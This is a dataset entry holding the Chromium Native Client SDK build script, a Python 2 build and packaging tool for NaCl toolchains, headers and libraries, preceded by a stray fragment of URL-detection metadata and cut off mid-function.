'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'ibd.re'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'ibd.as'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'ibd.as']]" +34,"#!/usr/bin/env python +# Copyright (c) 2012 The Chromium Authors. All rights reserved. +# Use of this source code is governed by a BSD-style license that can be +# found in the LICENSE file. + +""""""Entry point for both build and try bots. + +This script is invoked from XXX, usually without arguments +to package an SDK. It automatically determines whether +this SDK is for mac, win, linux. + +The script inspects the following environment variables: + +BUILDBOT_BUILDERNAME to determine whether the script is run locally +and whether it should upload an SDK to file storage (GSTORE) +"""""" + +# pylint: disable=W0621 + +# std python includes +import argparse +import datetime +import glob +import os +import re +import sys + +if sys.version_info < (2, 7, 0): + sys.stderr.write(""python 2.7 or later is required run this script\n"") + sys.exit(1) + +# local includes +import buildbot_common +import build_projects +import build_updater +import build_version +import generate_notice +import manifest_util +import parse_dsc +import verify_filelist + +from build_paths import SCRIPT_DIR, SDK_SRC_DIR, SRC_DIR, NACL_DIR, OUT_DIR +from build_paths import NACLPORTS_DIR, GSTORE, GONACL_APPENGINE_SRC_DIR + +# Add SDK make tools scripts to the python path. +sys.path.append(os.path.join(SDK_SRC_DIR, 'tools')) +sys.path.append(os.path.join(NACL_DIR, 'build')) + +import getos +import oshelpers + +BUILD_DIR = os.path.join(NACL_DIR, 'build') +NACL_TOOLCHAIN_DIR = os.path.join(NACL_DIR, 'toolchain') +NACL_TOOLCHAINTARS_DIR = os.path.join(NACL_TOOLCHAIN_DIR, '.tars') + +CYGTAR = os.path.join(BUILD_DIR, 'cygtar.py') +PKGVER = os.path.join(BUILD_DIR, 'package_version', 'package_version.py') + +NACLPORTS_URL = 'https://chromium.googlesource.com/external/naclports.git' +NACLPORTS_REV = 'PI:KEY' + +GYPBUILD_DIR = 'gypbuild' + +options = None + +# Map of: ToolchainName: (PackageName, SDKDir, arch). 
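+# e.g. on linux, 'x86_glibc' names the 'nacl_x86_glibc' package, which is +# unpacked under toolchain/linux_x86_glibc for the x86 architecture.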
+TOOLCHAIN_PACKAGE_MAP = { + 'arm_glibc': ('nacl_arm_glibc', '%(platform)s_arm_glibc', 'arm'), + 'x86_glibc': ('nacl_x86_glibc', '%(platform)s_x86_glibc', 'x86'), + 'pnacl': ('pnacl_newlib', '%(platform)s_pnacl', 'pnacl') + } + + +def GetToolchainDirName(tcname): + """"""Return the directory name for a given toolchain"""""" + return TOOLCHAIN_PACKAGE_MAP[tcname][1] % {'platform': getos.GetPlatform()} + + +def GetToolchainDir(pepperdir, tcname): + """"""Return the full path to a given toolchain within a given sdk root"""""" + return os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname)) + + +def GetToolchainLibc(tcname): + if tcname == 'pnacl': + return 'newlib' + for libc in ('glibc', 'newlib', 'host'): + if libc in tcname: + return libc + + +def GetToolchainNaClInclude(pepperdir, tcname, arch=None): + tcpath = GetToolchainDir(pepperdir, tcname) + if arch is None: + arch = TOOLCHAIN_PACKAGE_MAP[tcname][2] + if arch == 'x86': + return os.path.join(tcpath, 'x86_64-nacl', 'include') + elif arch == 'pnacl': + return os.path.join(tcpath, 'le32-nacl', 'include') + elif arch == 'arm': + return os.path.join(tcpath, 'arm-nacl', 'include') + else: + buildbot_common.ErrorExit('Unknown architecture: %s' % arch) + + +def GetConfigDir(arch): + if arch.endswith('x64') and getos.GetPlatform() == 'win': + return 'Release_x64' + else: + return 'Release' + + +def GetNinjaOutDir(arch): + return os.path.join(OUT_DIR, GYPBUILD_DIR + '-' + arch, GetConfigDir(arch)) + + +def GetGypBuiltLib(tcname, arch): + if arch == 'ia32': + lib_suffix = '32' + elif arch == 'x64': + lib_suffix = '64' + elif arch == 'arm': + lib_suffix = 'arm' + else: + lib_suffix = '' + + tcdir = 'tc_' + GetToolchainLibc(tcname) + + if tcname == 'pnacl': + if arch is None: + lib_suffix = '' + tcdir = 'tc_pnacl_newlib' + arch = 'x64' + else: + arch = 'clang-' + arch + + return os.path.join(GetNinjaOutDir(arch), 'gen', tcdir, 'lib' + lib_suffix) + + +def GetToolchainNaClLib(tcname, tcpath, arch): + if arch == 'ia32': + return os.path.join(tcpath, 'x86_64-nacl', 'lib32') + elif arch == 'x64': + return os.path.join(tcpath, 'x86_64-nacl', 'lib') + elif arch == 'arm': + return os.path.join(tcpath, 'arm-nacl', 'lib') + elif tcname == 'pnacl': + return os.path.join(tcpath, 'le32-nacl', 'lib') + + + +def GetOutputToolchainLib(pepperdir, tcname, arch): + tcpath = os.path.join(pepperdir, 'toolchain', GetToolchainDirName(tcname)) + return GetToolchainNaClLib(tcname, tcpath, arch) + + +def GetPNaClTranslatorLib(tcpath, arch): + if arch not in ['arm', 'x86-32', 'x86-64']: + buildbot_common.ErrorExit('Unknown architecture %s.' 
% arch) + return os.path.join(tcpath, 'translator', arch, 'lib') + + +def BuildStepDownloadToolchains(toolchains): + buildbot_common.BuildStep('Running package_version.py') + args = [sys.executable, PKGVER, '--mode', 'nacl_core_sdk'] + args.extend(['sync', '--extract']) + buildbot_common.Run(args, cwd=NACL_DIR) + + +def BuildStepCleanPepperDirs(pepperdir, pepperdir_old): + buildbot_common.BuildStep('Clean Pepper Dirs') + dirs_to_remove = ( + pepperdir, + pepperdir_old, + os.path.join(OUT_DIR, 'arm_trusted') + ) + for dirname in dirs_to_remove: + if os.path.exists(dirname): + buildbot_common.RemoveDir(dirname) + buildbot_common.MakeDir(pepperdir) + + +def BuildStepMakePepperDirs(pepperdir, subdirs): + for subdir in subdirs: + buildbot_common.MakeDir(os.path.join(pepperdir, subdir)) + +TEXT_FILES = [ + 'AUTHORS', + 'COPYING', + 'LICENSE', + 'README.Makefiles', + 'getting_started/README', +] + +def BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, + nacl_revision): + buildbot_common.BuildStep('Add Text Files') + InstallFiles(SDK_SRC_DIR, pepperdir, TEXT_FILES) + + # Replace a few placeholders in README + readme_text = open(os.path.join(SDK_SRC_DIR, 'README')).read() + readme_text = readme_text.replace('${VERSION}', pepper_ver) + readme_text = readme_text.replace('${CHROME_REVISION}', chrome_revision) + readme_text = readme_text.replace('${CHROME_COMMIT_POSITION}', + build_version.ChromeCommitPosition()) + readme_text = readme_text.replace('${NACL_REVISION}', nacl_revision) + + # Year/Month/Day Hour:Minute:Second + time_format = '%Y/%m/%d %H:%M:%S' + readme_text = readme_text.replace('${DATE}', + datetime.datetime.now().strftime(time_format)) + + open(os.path.join(pepperdir, 'README'), 'w').write(readme_text) + + +def BuildStepUntarToolchains(pepperdir, toolchains): + buildbot_common.BuildStep('Untar Toolchains') + platform = getos.GetPlatform() + build_platform = '%s_x86' % platform + tmpdir = os.path.join(OUT_DIR, 'tc_temp') + buildbot_common.RemoveDir(tmpdir) + buildbot_common.MakeDir(tmpdir) + + # Create a list of extract packages tuples, the first part should be + # ""$PACKAGE_TARGET/$PACKAGE"". The second part should be the destination + # directory relative to pepperdir/toolchain. + extract_packages = [] + for toolchain in toolchains: + toolchain_map = TOOLCHAIN_PACKAGE_MAP.get(toolchain, None) + if toolchain_map: + package_name, tcdir, _ = toolchain_map + package_tuple = (os.path.join(build_platform, package_name), + tcdir % {'platform': platform}) + extract_packages.append(package_tuple) + + + # On linux we also want to extract the arm_trusted package which contains + # the ARM libraries we ship in support of sel_ldr_arm. + if platform == 'linux': + extract_packages.append((os.path.join(build_platform, 'arm_trusted'), + 'arm_trusted')) + if extract_packages: + # Extract all of the packages into the temp directory. + package_names = [package_tuple[0] for package_tuple in extract_packages] + buildbot_common.Run([sys.executable, PKGVER, + '--packages', ','.join(package_names), + '--tar-dir', NACL_TOOLCHAINTARS_DIR, + '--dest-dir', tmpdir, + 'extract']) + + # Move all the packages we extracted to the correct destination. + for package_name, dest_dir in extract_packages: + full_src_dir = os.path.join(tmpdir, package_name) + full_dst_dir = os.path.join(pepperdir, 'toolchain', dest_dir) + buildbot_common.Move(full_src_dir, full_dst_dir) + + # Cleanup the temporary directory we are no longer using. + buildbot_common.RemoveDir(tmpdir) + + +# List of toolchain headers to install. 
+# Source is relative to top of Chromium tree, destination is relative +# to the toolchain header directory. +NACL_HEADER_MAP = { + 'newlib': [ + ('native_client/src/include/nacl/nacl_exception.h', 'nacl/'), + ('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'), + ('native_client/src/untrusted/irt/irt.h', ''), + ('native_client/src/untrusted/irt/irt_dev.h', ''), + ('native_client/src/untrusted/irt/irt_extension.h', ''), + ('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'), + ('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'), + ('native_client/src/untrusted/pthread/pthread.h', ''), + ('native_client/src/untrusted/pthread/semaphore.h', ''), + ('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'), + ('ppapi/nacl_irt/public/irt_ppapi.h', ''), + ], + 'glibc': [ + ('native_client/src/include/nacl/nacl_exception.h', 'nacl/'), + ('native_client/src/include/nacl/nacl_minidump.h', 'nacl/'), + ('native_client/src/untrusted/irt/irt.h', ''), + ('native_client/src/untrusted/irt/irt_dev.h', ''), + ('native_client/src/untrusted/irt/irt_extension.h', ''), + ('native_client/src/untrusted/nacl/nacl_dyncode.h', 'nacl/'), + ('native_client/src/untrusted/nacl/nacl_startup.h', 'nacl/'), + ('native_client/src/untrusted/valgrind/dynamic_annotations.h', 'nacl/'), + ('ppapi/nacl_irt/public/irt_ppapi.h', ''), + ], +} + +def InstallFiles(src_root, dest_root, file_list): + """"""Copy a set of files from src_root to dest_root according + to the given mapping. This allows files to be copied + to a location in the destination tree that is different from their + location in the source tree. + + If the destination mapping ends with a '/' then the destination + basename is inherited from the source file. + + Wildcards can be used in the source list but it is not recommended + as this can end up adding things to the SDK unintentionally. + A short usage sketch appears further below, after MakeNinjaRelPath(). + """""" + for file_spec in file_list: + # The list of files to install can be a simple list of + # strings or a list of pairs, where each pair corresponds + # to a mapping from source to destination names. + if type(file_spec) == str: + src_file = dest_file = file_spec + else: + src_file, dest_file = file_spec + + src_file = os.path.join(src_root, src_file) + + # Expand source files using glob. + sources = glob.glob(src_file) + if not sources: + sources = [src_file] + + if len(sources) > 1 and not dest_file.endswith('/'): + buildbot_common.ErrorExit(""Target file must end in '/' when "" + ""using globbing to install multiple files"") + + for source in sources: + if dest_file.endswith('/'): + dest = os.path.join(dest_file, os.path.basename(source)) + else: + dest = dest_file + dest = os.path.join(dest_root, dest) + if not os.path.isdir(os.path.dirname(dest)): + buildbot_common.MakeDir(os.path.dirname(dest)) + buildbot_common.CopyFile(source, dest) + + +def InstallNaClHeaders(tc_dst_inc, tcname): + """"""Copies NaCl headers to expected locations in the toolchain."""""" + InstallFiles(SRC_DIR, tc_dst_inc, NACL_HEADER_MAP[GetToolchainLibc(tcname)]) + + +def MakeNinjaRelPath(path): + return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path) + + +# TODO(ncbray): stop building and copying libraries into the SDK that are +# already provided by the toolchain.
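+# Illustrative sketch (added, not part of the original script): how the
+# InstallFiles() mapping rules above behave. The paths are hypothetical and
+# only demonstrate the destination-mapping conventions from its docstring.
+#
+#   InstallFiles('/src', '/sdk', [
+#       'README',                     # plain string: copied to /sdk/README
+#       ('docs/guide.txt', 'doc/'),   # trailing '/': basename inherited,
+#                                     #   so it lands at /sdk/doc/guide.txt
+#       ('include/*.h', 'include/'),  # glob with multiple matches: the
+#                                     #   destination must end with '/'
+#   ])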
+# Mapping from libc to libraries gyp-build trusted libraries +TOOLCHAIN_LIBS = { + 'newlib' : [ + 'libminidump_generator.a', + 'libnacl.a', + 'libnacl_dyncode.a', + 'libnacl_exception.a', + 'libnacl_list_mappings.a', + 'libnosys.a', + 'libppapi.a', + 'libppapi_stub.a', + 'libpthread.a', + ], + 'glibc': [ + 'libminidump_generator.a', + 'libminidump_generator.so', + 'libnacl.a', + 'libnacl_dyncode.a', + 'libnacl_dyncode.so', + 'libnacl_exception.a', + 'libnacl_exception.so', + 'libnacl_list_mappings.a', + 'libnacl_list_mappings.so', + 'libppapi.a', + 'libppapi.so', + 'libppapi_stub.a', + ] +} + + +def GypNinjaInstall(pepperdir, toolchains): + tools_files_32 = [ + ['sel_ldr', 'sel_ldr_x86_32'], + ['irt_core_newlib_x32.nexe', 'irt_core_x86_32.nexe'], + ['irt_core_newlib_x64.nexe', 'irt_core_x86_64.nexe'], + ] + arm_files = [ + ['elf_loader_newlib_arm.nexe', 'elf_loader_arm.nexe'], + ] + + tools_files_64 = [] + + platform = getos.GetPlatform() + + # TODO(binji): dump_syms doesn't currently build on Windows. See + # http://crbug.com/245456 + if platform != 'win': + tools_files_64 += [ + ['dump_syms', 'dump_syms'], + ['minidump_dump', 'minidump_dump'], + ['minidump_stackwalk', 'minidump_stackwalk'] + ] + + tools_files_64.append(['sel_ldr', 'sel_ldr_x86_64']) + tools_files_64.append(['ncval_new', 'ncval']) + + if platform == 'linux': + tools_files_32.append(['nacl_helper_bootstrap', + 'nacl_helper_bootstrap_x86_32']) + tools_files_64.append(['nacl_helper_bootstrap', + 'nacl_helper_bootstrap_x86_64']) + tools_files_32.append(['nonsfi_loader_newlib_x32_nonsfi.nexe', + 'nonsfi_loader_x86_32']) + + tools_dir = os.path.join(pepperdir, 'tools') + buildbot_common.MakeDir(tools_dir) + + # Add .exe extensions to all windows tools + for pair in tools_files_32 + tools_files_64: + if platform == 'win' and not pair[0].endswith('.nexe'): + pair[0] += '.exe' + pair[1] += '.exe' + + # Add ARM binaries + if platform == 'linux' and not options.no_arm_trusted: + arm_files += [ + ['irt_core_newlib_arm.nexe', 'irt_core_arm.nexe'], + ['nacl_helper_bootstrap', 'nacl_helper_bootstrap_arm'], + ['nonsfi_loader_newlib_arm_nonsfi.nexe', 'nonsfi_loader_arm'], + ['sel_ldr', 'sel_ldr_arm'] + ] + + InstallFiles(GetNinjaOutDir('x64'), tools_dir, tools_files_64) + InstallFiles(GetNinjaOutDir('ia32'), tools_dir, tools_files_32) + InstallFiles(GetNinjaOutDir('arm'), tools_dir, arm_files) + + for tc in toolchains: + if tc in ('host', 'clang-newlib'): + continue + elif tc == 'pnacl': + xarches = (None, 'ia32', 'x64', 'arm') + elif tc in ('x86_glibc', 'x86_newlib'): + xarches = ('ia32', 'x64') + elif tc == 'arm_glibc': + xarches = ('arm',) + else: + raise AssertionError('unexpected toolchain value: %s' % tc) + + for xarch in xarches: + src_dir = GetGypBuiltLib(tc, xarch) + dst_dir = GetOutputToolchainLib(pepperdir, tc, xarch) + libc = GetToolchainLibc(tc) + InstallFiles(src_dir, dst_dir, TOOLCHAIN_LIBS[libc]) + + +def GypNinjaBuild_NaCl(rel_out_dir): + gyp_py = os.path.join(NACL_DIR, 'build', 'gyp_nacl') + nacl_core_sdk_gyp = os.path.join(NACL_DIR, 'build', 'nacl_core_sdk.gyp') + all_gyp = os.path.join(NACL_DIR, 'build', 'all.gyp') + + out_dir_32 = MakeNinjaRelPath(rel_out_dir + '-ia32') + out_dir_64 = MakeNinjaRelPath(rel_out_dir + '-x64') + out_dir_arm = MakeNinjaRelPath(rel_out_dir + '-arm') + out_dir_clang_32 = MakeNinjaRelPath(rel_out_dir + '-clang-ia32') + out_dir_clang_64 = MakeNinjaRelPath(rel_out_dir + '-clang-x64') + out_dir_clang_arm = MakeNinjaRelPath(rel_out_dir + '-clang-arm') + + GypNinjaBuild('ia32', gyp_py, 
nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_32, + gyp_defines=['use_nacl_clang=0']) + GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_64, + gyp_defines=['use_nacl_clang=0']) + GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir_arm, + gyp_defines=['use_nacl_clang=0']) + GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', + out_dir_clang_32, gyp_defines=['use_nacl_clang=1']) + GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', + out_dir_clang_64, gyp_defines=['use_nacl_clang=1']) + GypNinjaBuild('arm', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', + out_dir_clang_arm, gyp_defines=['use_nacl_clang=1']) + GypNinjaBuild('x64', gyp_py, all_gyp, 'ncval_new', out_dir_64) + + +def GypNinjaBuild_Breakpad(rel_out_dir): + # TODO(binji): dump_syms doesn't currently build on Windows. See + # http://crbug.com/245456 + if getos.GetPlatform() == 'win': + return + + gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium') + out_dir = MakeNinjaRelPath(rel_out_dir) + gyp_file = os.path.join(SRC_DIR, 'breakpad', 'breakpad.gyp') + build_list = ['dump_syms', 'minidump_dump', 'minidump_stackwalk'] + GypNinjaBuild('x64', gyp_py, gyp_file, build_list, out_dir) + + +def GypNinjaBuild_PPAPI(arch, rel_out_dir, gyp_defines=None): + gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium') + out_dir = MakeNinjaRelPath(rel_out_dir) + gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', + 'native_client.gyp') + GypNinjaBuild(arch, gyp_py, gyp_file, 'ppapi_lib', out_dir, + gyp_defines=gyp_defines) + + +def GypNinjaBuild_Pnacl(rel_out_dir, target_arch): + # TODO(binji): This will build the pnacl_irt_shim twice; once as part of the + # Chromium build, and once here. When we move more of the SDK build process + # to gyp, we can remove this. + gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium') + + out_dir = MakeNinjaRelPath(rel_out_dir) + gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'src', + 'untrusted', 'pnacl_irt_shim', 'pnacl_irt_shim.gyp') + targets = ['aot'] + GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir) + + +def GypNinjaBuild(arch, gyp_py_script, gyp_file, targets, + out_dir, gyp_defines=None): + gyp_env = dict(os.environ) + gyp_env['GYP_GENERATORS'] = 'ninja' + gyp_defines = gyp_defines or [] + gyp_defines.append('nacl_allow_thin_archives=0') + if not options.no_use_sysroot: + gyp_defines.append('use_sysroot=1') + if options.mac_sdk: + gyp_defines.append('mac_sdk=%s' % options.mac_sdk) + + if arch is not None: + gyp_defines.append('target_arch=%s' % arch) + if arch == 'arm': + gyp_env['GYP_CROSSCOMPILE'] = '1' + if options.no_arm_trusted: + gyp_defines.append('disable_cross_trusted=1') + if getos.GetPlatform() == 'mac': + gyp_defines.append('clang=1') + + gyp_env['GYP_DEFINES'] = ' '.join(gyp_defines) + # We can't use windows path separators in GYP_GENERATOR_FLAGS since + # gyp uses shlex to parse them and treats '\' as an escape char. 
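+  # Illustrative note (added): with a backslash separator shlex would give
+  #   shlex.split('output_dir=out\Release') -> ['output_dir=outRelease']
+  # silently swallowing the separator, hence the forward-slash rewrite below.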
+ gyp_env['GYP_GENERATOR_FLAGS'] = 'output_dir=%s' % out_dir.replace('\\', '/') + + # Print relevant environment variables + for key, value in gyp_env.iteritems(): + if key.startswith('GYP') or key in ('CC',): + print ' %s=""%s""' % (key, value) + + buildbot_common.Run( + [sys.executable, gyp_py_script, gyp_file, '--depth=.'], + cwd=SRC_DIR, + env=gyp_env) + + NinjaBuild(targets, out_dir, arch) + + +def NinjaBuild(targets, out_dir, arch): + if type(targets) is not list: + targets = [targets] + out_config_dir = os.path.join(out_dir, GetConfigDir(arch)) + buildbot_common.Run(['ninja', '-C', out_config_dir] + targets, cwd=SRC_DIR) + + +def BuildStepBuildToolchains(pepperdir, toolchains, build, clean): + buildbot_common.BuildStep('SDK Items') + + if clean: + for dirname in glob.glob(os.path.join(OUT_DIR, GYPBUILD_DIR + '*')): + buildbot_common.RemoveDir(dirname) + build = True + + if build: + GypNinjaBuild_NaCl(GYPBUILD_DIR) + GypNinjaBuild_Breakpad(GYPBUILD_DIR + '-x64') + + if set(toolchains) & set(['x86_glibc', 'x86_newlib']): + GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-ia32', + ['use_nacl_clang=0']) + GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-x64', + ['use_nacl_clang=0']) + + if 'arm_glibc' in toolchains: + GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-arm', + ['use_nacl_clang=0'] ) + + if 'pnacl' in toolchains: + GypNinjaBuild_PPAPI('ia32', GYPBUILD_DIR + '-clang-ia32', + ['use_nacl_clang=1']) + GypNinjaBuild_PPAPI('x64', GYPBUILD_DIR + '-clang-x64', + ['use_nacl_clang=1']) + GypNinjaBuild_PPAPI('arm', GYPBUILD_DIR + '-clang-arm', + ['use_nacl_clang=1']) + + # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default. + for arch in ('ia32', 'arm'): + # Fill in the latest native pnacl shim library from the chrome build. + build_dir = GYPBUILD_DIR + '-pnacl-' + arch + GypNinjaBuild_Pnacl(build_dir, arch) + + GypNinjaInstall(pepperdir, toolchains) + + for toolchain in toolchains: + if toolchain not in ('host', 'clang-newlib'): + InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, toolchain), + toolchain) + + + if 'pnacl' in toolchains: + # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default. + for arch in ('ia32', 'arm'): + # Fill in the latest native pnacl shim library from the chrome build. + build_dir = GYPBUILD_DIR + '-pnacl-' + arch + if arch == 'ia32': + nacl_arches = ['x86-32', 'x86-64'] + elif arch == 'arm': + nacl_arches = ['arm'] + else: + buildbot_common.ErrorExit('Unknown architecture: %s' % arch) + for nacl_arch in nacl_arches: + release_build_dir = os.path.join(OUT_DIR, build_dir, 'Release', + 'gen', 'tc_pnacl_translate', + 'lib-' + nacl_arch) + + pnacldir = GetToolchainDir(pepperdir, 'pnacl') + pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir, nacl_arch) + if not os.path.isdir(pnacl_translator_lib_dir): + buildbot_common.ErrorExit('Expected %s directory to exist.' 
% + pnacl_translator_lib_dir) + + buildbot_common.CopyFile( + os.path.join(release_build_dir, 'libpnacl_irt_shim.a'), + pnacl_translator_lib_dir) + + InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'x86'), + 'pnacl') + InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, 'pnacl', 'arm'), + 'pnacl') + + +def MakeDirectoryOrClobber(pepperdir, dirname, clobber): + dirpath = os.path.join(pepperdir, dirname) + if clobber: + buildbot_common.RemoveDir(dirpath) + buildbot_common.MakeDir(dirpath) + + return dirpath + + +def BuildStepUpdateHelpers(pepperdir, clobber): + buildbot_common.BuildStep('Update project helpers') + build_projects.UpdateHelpers(pepperdir, clobber=clobber) + + +def BuildStepUpdateUserProjects(pepperdir, toolchains, + build_experimental, clobber): + buildbot_common.BuildStep('Update examples and libraries') + + filters = {} + if not build_experimental: + filters['EXPERIMENTAL'] = False + + dsc_toolchains = [] + for t in toolchains: + if t.startswith('x86_') or t.startswith('arm_'): + if t[4:] not in dsc_toolchains: + dsc_toolchains.append(t[4:]) + elif t == 'host': + dsc_toolchains.append(getos.GetPlatform()) + else: + dsc_toolchains.append(t) + + filters['TOOLS'] = dsc_toolchains + + # Update examples and libraries + filters['DEST'] = [ + 'getting_started', + 'examples/api', + 'examples/demo', + 'examples/tutorial', + 'src' + ] + + tree = parse_dsc.LoadProjectTree(SDK_SRC_DIR, include=filters) + build_projects.UpdateProjects(pepperdir, tree, clobber=clobber, + toolchains=dsc_toolchains) + + +def BuildStepMakeAll(pepperdir, directory, step_name, + deps=True, clean=False, config='Debug', args=None): + buildbot_common.BuildStep(step_name) + build_projects.BuildProjectsBranch(pepperdir, directory, clean, + deps, config, args) + + +def BuildStepBuildLibraries(pepperdir, directory): + BuildStepMakeAll(pepperdir, directory, 'Build Libraries Debug', + clean=True, config='Debug') + BuildStepMakeAll(pepperdir, directory, 'Build Libraries Release', + clean=True, config='Release') + + # Cleanup .pyc file generated while building libraries. Without + # this we would end up shipping the pyc in the SDK tarball. 
+ buildbot_common.RemoveFile(os.path.join(pepperdir, 'tools', '*.pyc')) + + +def GenerateNotice(fileroot, output_filename='NOTICE', extra_files=None): + # Look for LICENSE files + license_filenames_re = re.compile('LICENSE|COPYING|COPYRIGHT') + + license_files = [] + for root, _, files in os.walk(fileroot): + for filename in files: + if license_filenames_re.match(filename): + path = os.path.join(root, filename) + license_files.append(path) + + if extra_files: + license_files += [os.path.join(fileroot, f) for f in extra_files] + print '\n'.join(license_files) + + if not os.path.isabs(output_filename): + output_filename = os.path.join(fileroot, output_filename) + generate_notice.Generate(output_filename, fileroot, license_files) + + +def BuildStepVerifyFilelist(pepperdir): + buildbot_common.BuildStep('Verify SDK Files') + file_list_path = os.path.join(SCRIPT_DIR, 'sdk_files.list') + try: + print 'SDK directory: %s' % pepperdir + verify_filelist.Verify(file_list_path, pepperdir) + print 'OK' + except verify_filelist.ParseException, e: + buildbot_common.ErrorExit('Parsing sdk_files.list failed:\n\n%s' % e) + except verify_filelist.VerifyException, e: + file_list_rel = os.path.relpath(file_list_path) + verify_filelist_py = os.path.splitext(verify_filelist.__file__)[0] + '.py' + verify_filelist_py = os.path.relpath(verify_filelist_py) + pepperdir_rel = os.path.relpath(pepperdir) + + msg = """"""\ +SDK verification failed: + +%s +Add/remove files from %s to fix. + +Run: + ./%s %s %s +to test."""""" % (e, file_list_rel, verify_filelist_py, file_list_rel, + pepperdir_rel) + buildbot_common.ErrorExit(msg) + + +def BuildStepTarBundle(pepper_ver, tarfile): + buildbot_common.BuildStep('Tar Pepper Bundle') + buildbot_common.MakeDir(os.path.dirname(tarfile)) + buildbot_common.Run([sys.executable, CYGTAR, '-C', OUT_DIR, '-cjf', tarfile, + 'pepper_' + pepper_ver], cwd=NACL_DIR) + + +def GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, tarfile, + archive_url): + with open(tarfile, 'rb') as tarfile_stream: + archive_sha1, archive_size = manifest_util.DownloadAndComputeHash( + tarfile_stream) + + archive = manifest_util.Archive(manifest_util.GetHostOS()) + archive.url = archive_url + archive.size = archive_size + archive.checksum = archive_sha1 + + bundle = manifest_util.Bundle('pepper_' + pepper_ver) + bundle.revision = int(chrome_revision) + bundle.repath = 'pepper_' + pepper_ver + bundle.version = int(pepper_ver) + bundle.description = ( + 'Chrome %s bundle. Chrome revision: %s. NaCl revision: %s' % ( + pepper_ver, chrome_revision, nacl_revision)) + bundle.stability = 'dev' + bundle.recommended = 'no' + bundle.archives = [archive] + return bundle + + +def Archive(filename, from_directory, step_link=True): + if buildbot_common.IsSDKBuilder(): + bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/' + else: + bucket_path = 'nativeclient-mirror/nacl/nacl_sdk_test/' + bucket_path += build_version.ChromeVersion() + buildbot_common.Archive(filename, bucket_path, from_directory, step_link) + + +def BuildStepArchiveBundle(name, pepper_ver, chrome_revision, nacl_revision, + tarfile): + buildbot_common.BuildStep('Archive %s' % name) + tarname = os.path.basename(tarfile) + tarfile_dir = os.path.dirname(tarfile) + Archive(tarname, tarfile_dir) + + # generate ""manifest snippet"" for this archive. 
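+  # (Added sketch) Roughly, the snippet written below serialises the bundle
+  # fields set in GetManifestBundle(); the exact JSON layout is up to
+  # manifest_util, but it carries at least:
+  #   {'name': 'pepper_<ver>', 'revision': <chrome rev>, 'version': <ver>,
+  #    'stability': 'dev', 'recommended': 'no', 'archives': [{...}]}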
+ archive_url = GSTORE + 'nacl_sdk/%s/%s' % ( + build_version.ChromeVersion(), tarname) + bundle = GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, + tarfile, archive_url) + + manifest_snippet_file = os.path.join(OUT_DIR, tarname + '.json') + with open(manifest_snippet_file, 'wb') as manifest_snippet_stream: + manifest_snippet_stream.write(bundle.GetDataAsString()) + + Archive(tarname + '.json', OUT_DIR, step_link=False) + + +def BuildStepBuildPNaClComponent(version, revision): + # Sadly revision can go backwards for a given version since when a version + # is built from master, revision will be a huge number (in the hundreds of + # thousands). Once the branch happens the revision will reset to zero. + # TODO(sbc): figure out how to compensate for this in some way such that + # revisions always go forward for a given version. + buildbot_common.BuildStep('PNaCl Component') + # Version numbers must follow the format specified in: + # https://developer.chrome.com/extensions/manifest/version + # So ensure that rev_major/rev_minor don't overflow and ensure there + # are no leading zeros. + # (Added example) e.g. revision '352221' splits into rev_major=35 and + # rev_minor=2221, giving version '0.<pepper_ver>.35.2221'. + if len(revision) > 4: + rev_minor = int(revision[-4:]) + rev_major = int(revision[:-4]) + version = ""0.%s.%s.%s"" % (version, rev_major, rev_minor) + else: + version = ""0.%s.0.%s"" % (version, revision) + buildbot_common.Run(['./make_pnacl_component.sh', + 'pnacl_multicrx_%s.zip' % revision, + version], cwd=SCRIPT_DIR) + + +def BuildStepArchivePNaClComponent(revision): + buildbot_common.BuildStep('Archive PNaCl Component') + Archive('pnacl_multicrx_%s.zip' % revision, OUT_DIR) + + +def BuildStepArchiveSDKTools(): + buildbot_common.BuildStep('Build SDK Tools') + build_updater.BuildUpdater(OUT_DIR) + + buildbot_common.BuildStep('Archive SDK Tools') + Archive('sdk_tools.tgz', OUT_DIR, step_link=False) + Archive('nacl_sdk.zip', OUT_DIR, step_link=False) + + +def BuildStepBuildAppEngine(pepperdir, chrome_revision): + """"""Build the 